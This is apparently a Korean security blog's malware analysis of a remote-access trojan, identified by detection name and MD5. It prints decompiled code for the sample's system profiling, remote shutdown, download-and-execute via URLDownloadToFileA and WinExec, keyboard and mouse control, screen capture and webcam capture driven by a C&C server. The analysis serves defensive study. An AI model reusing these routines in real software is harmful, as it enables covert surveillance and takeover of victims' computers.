336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
Detection Name : GenPack:Trojan.Generic.2618737

MD5 : deaf01d9625d4104dbdc00eba37d7fc0


사용자 시스템 정보 수집

GetComputerNameA(&Buffer, &nSize)
GetVersionExA(&VersionInformation)
GlobalMemoryStatus((LPMEMORYSTATUS)&v15)


종료 및 재부팅

case 0x1000001:
  sub_300A70("SetShutdownPrivilege",1);
  ExitWindowsEx(0xCu, 0);
  break;
case 0x1000002:
  sub_300A70("SetShutdownPrivilege",1);
  ExitWindowsEx(0x6u, 0);
  break;
case 0x1000003:
  sub_300A70("SetShutdownPrivilege",1);
  ExitWindowsEx(0x4u, 0);
  break;


파일 다운로드 및 실행

wsprintfA(&v8, "abcdefg.exe");
GetTemppathA(0x104u, &CmdLine);
strcat(&CmdLine, "\\")
strcat(&CmdLine, &v8);
v1 = LoadLibraryA("urlmon.dll");
v2 = GetProcAddress(v1, "URLDownloadToFileA");
......
return WinExec(&CmdLine, 5u)


키보드/마우스 이벤트 API를 호출하여 제어

case 0x10000011:
  sub_300120(&v32);
  keybd_event(X[0], 0, 0, 0);
  sub_300170(&v32);
  break;
case 0x10000012:
  sub_300120(&v28);
  keybd_event(X[0], 0, 2u, 0);
  sub_300170(&v28);
  break;
case 0x10000013:
  sub_300120(&v30);
  SetCursorPos(*(int *)X, Y);
  sub_300170(&v30);
  break;
case 0x10000014:
  sub_300120(&v24);
  mouse_event(2u, 0, 0, 0, 0);
  sub_300170(&v24);
  break;
case 0x10000015:
  sub_300120(&v27);
  mouse_event(4u, 0, 0, 0, 0);
  sub_300170(&v27);
  break;


PC화면 스크린샷

CreateDC 함수 호출 후 전체 화면 DC 생성
CreateCompatibleDC 함수 호출 후 만들어진 전체 화면 DC를 호환되는 메모리 DC로 생성
CreateCompatibleBitmap 함수 호출 후 비트맵을 생성
BitBlt 함수를 호출 해서 메모리 DC에 화면 DC를 복사

v1 = this;
v2 = CreateDCA("DISPLAY", 0, 0, 0);
v3 = v2;
v4 = CreateCompatibleDC(v2);
v5 = v4;
v6 = v4;
v7 = CreateCompatibleBitmap(v3, *((_DWORD *)v1 + 5), *((_DWORD *)v1 + 6));
SelectObject(v5, v7);
BitBlt(v5, 0, 0, *((_DWORD *)v1 + 5), *((_DWORD *)v1 + 6), v3, 0, 0, 0xCC0020u);
............
GetDIBits(v6, v7, 0, *((_DWORD *)v1 + 6), (LPVOID)(*((_DWORD *)v1 + 1) + *((_DWORD *)v1 + 4)), (LPBITMAPINFO)v10, 0);
DeleteDC(v6);
DeleteDC(v3);
return DeleteObject(v7);


캠 도청

capCreateCaptureWindow 함수 호출 후 캡쳐 윈도우를 생성

C&C 서버에서 capDrivaerConnec 함수 호출 후 캡쳐 드라이브와 캡쳐 윈도우를 연결

v2 = CreateWindowExA(0, "#11220", WindowName, 0x80000000u, 0, 0, 0, 0, 0, 0, 0, 0);
*(_DWORD *)(v1 + 12) = v2;
*(_DWORD *)(v1 + 16) = capCreateCaptureWindowa("CVideoCap", 1342177280, 0, 0, 0, 0, v2, 0);



'Analysis > Malware' 카테고리의 다른 글

Packed.Dropper.PE  (0) 2016.07.27
[로컬 백도어] Image file execution option  (0) 2016.06.21
CryptXXX Decryptor  (0) 2016.06.21
Malware Classification  (0) 2016.06.21
Hosts 변조  (0) 2016.06.20

+ Recent posts